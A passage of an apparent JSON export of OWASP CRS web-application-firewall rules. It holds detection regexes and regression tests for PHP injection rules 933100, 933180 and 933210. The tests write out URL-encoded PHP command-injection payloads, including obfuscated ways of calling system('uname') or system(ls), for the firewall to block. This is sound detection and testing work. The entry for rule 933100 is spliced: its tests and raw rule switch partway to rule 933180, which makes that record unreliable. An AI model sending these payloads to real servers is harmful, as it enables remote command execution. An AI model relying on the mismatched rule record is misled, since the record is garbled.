"lineno": 86, "act_quote": "no_quote", "act_arg": "956016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 86, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 86, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 86, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 86, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 86, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 86, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 86 } }, { "rule_id": "956017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 93, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 93, "act_quote": "no_quote", "act_arg": "956017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 93, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 93, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 93, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 93, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 93, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 93, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 93 } }, { "rule_id": "956018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 94, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 94, "act_quote": "no_quote", "act_arg": "956018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 94, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 94, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 94, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 94, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 94, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 94, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 94 } }, { "rule_id": "933011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 17, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 17, "act_quote": "no_quote", "act_arg": "933011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 17, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 17, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 17 } }, { "rule_id": "933012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 18, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 18, "act_quote": "no_quote", "act_arg": "933012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 18, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 18, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 18 } }, { "rule_id": "933100", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: PHP Open Tag Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "PHP Injection Attack (933100) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/get?foo=bar}(200)", "test_id": 34, "request": { "method": "GET", "uri": "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%24%7B%24foo-%3Ebar%7D%28200%29" } ] }, { "description": "$foo->$funcname()", "test_id": 35, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%24foo-%3E%24funcname%28%29" }, "expected": { "should_block": true, "rule_ids": [ 933180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%24foo-%3E%24funcname%28%29" } ] }, { "description": "Foo::$variable()", "test_id": 36, "request": { "method": "GET", "uri": "/get?x=Foo%3A%3A%24variable%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=Foo%3A%3A%24variable%28%29" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 485, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\$+(?:[a-zA-Z_\\x7f-\\xff][a-zA-Z0-9_\\x7f-\\xff]*|\\s*{.+})(?:\\s|\\[.+\\]|{.+}|/\\*.*\\*/|//.*|#.*)*\\(.*\\)", "actions": [ { "act_name": "id", "lineno": 486, "act_quote": "no_quote", "act_arg": "933180", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 487, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 488, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 489, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 490, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 491, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Variable Function Call Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 492, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 493, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 494, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 495, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 496, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 497, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 498, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 499, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 500, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 501, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 502, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 503, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 504, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 485 } }, { "rule_id": "933210", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:\\((?:.+\\)(?:[\\\"'][\\-0-9A-Z_a-z]+[\\\"'])?\\(.+|[^\\)]*string[^\\)]*\\)[\\s\\x0b\\\"'\\-\\.0-9A-\\[\\]_a-\\{\\}]+\\([^\\)]*)|(?:\\[[0-9]+\\]|\\{[0-9]+\\}|\\$[^\\(\\),\\./;\\x5c]+|[\\\"'][\\-0-9A-Z\\x5c_a-z]+[\\\"'])\\(.+)\\);", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments", "removeWhitespace" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Variable Function Call Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "Check for false positive 1", "test_id": 1, "request": { "method": "GET", "uri": "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29.", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." } ] }, { "description": "Check for false positive 2", "test_id": 2, "request": { "method": "GET", "uri": "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" } ] }, { "description": "PHP Variable Function bypass \"(system)('uname')\"", "test_id": 3, "request": { "method": "GET", "uri": "/get?x=%28system%29%28%27uname%27%29%20%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28system%29%28%27uname%27%29%20%3B" } ] }, { "description": "PHP Variable Function bypass \"(sy.(st).em)('uname')\"", "test_id": 4, "request": { "method": "GET", "uri": "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(string)'system'('uname')\"", "test_id": 5, "request": { "method": "GET", "uri": "/get?x=%28string%29%22system%22%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28string%29%22system%22%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"( string ) 'sys'.'t'.'em' ('uname')\"", "test_id": 6, "request": { "method": "GET", "uri": "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(string) {[system][0]} ('uname')\"", "test_id": 7, "request": { "method": "GET", "uri": "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"define('x', 'sys' . 'tem');(x)/* comment */('uname')\"", "test_id": 8, "request": { "method": "GET", "uri": "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"$y = 'sys'.'tem';($y)('uname')\"", "test_id": 9, "request": { "method": "GET", "uri": "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"define('z', [['sys' .'tem']]);(z)[0][0]('uname')\"", "test_id": 10, "request": { "method": "GET", "uri": "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(system)(ls)\"", "test_id": 11, "request": { "method": "GET", "uri": "/get?x=%28system%29%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28system%29%28ls%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(/* comment */system)(ls/* comment */)\"", "test_id": 12, "request": { "method": "GET", "uri": "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" } ] }, { "description": "PHP Variable Function bypass \"[system][0](ls)\"", "test_id": 13, "request": { "method": "GET", "uri": "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%5bsystem%5d%5b0%5d%28ls%29%3B" } ] }, { "description": "PHP Variable Function bypass \"[ system ] [ 0 ] ( ls )\"", "test_id": 14, "request": { "method": "GET", "uri": "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" } ] }, { "description": "PHP Variable Function bypass \"(['system'])[0]('uname')\"", "test_id": 15, "request": { "method": "GET", "uri": "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" } ] }, { "description": "PHP Variable Function bypass \"( [ system ][ 0 ]) {/* comment */0} ( ls )\"", "test_id": 16, "request": { "method": "GET", "uri": "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" } ] }, { "description": "Check FP if Cookie contains '/' (slash)", "test_id": 17, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Cookie": "x=(foo)/(bar)", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933210 ] }, "malicious_patterns": [] }, { "description": "Check FP if Cookie contains '/' (slash)", "test_id": 18, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Cookie": "x=(/foo)/(/bar)", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933210 ] }, "malicious_patterns": [] }, { "description": "Check FP if text contains quotes and round parenthesis", "test_id": 19, "request": { "method": "GET", "uri": "/get?search=this+is+a+%22dog%22+%28not+a+cat%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "search=this+is+a+%22dog%22+%28not+a+cat%29" } ] }, { "description": "Block function call via string", "test_id": 20, "request": { "method": "GET", "uri": "/get?code=%22system%22%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "code=%22system%22%28ls%29%3B" } ] }, { "description": "Block function call via string using hex escape sequence", "test_id": 21, "request": { "method": "GET", "uri": "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 533, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": 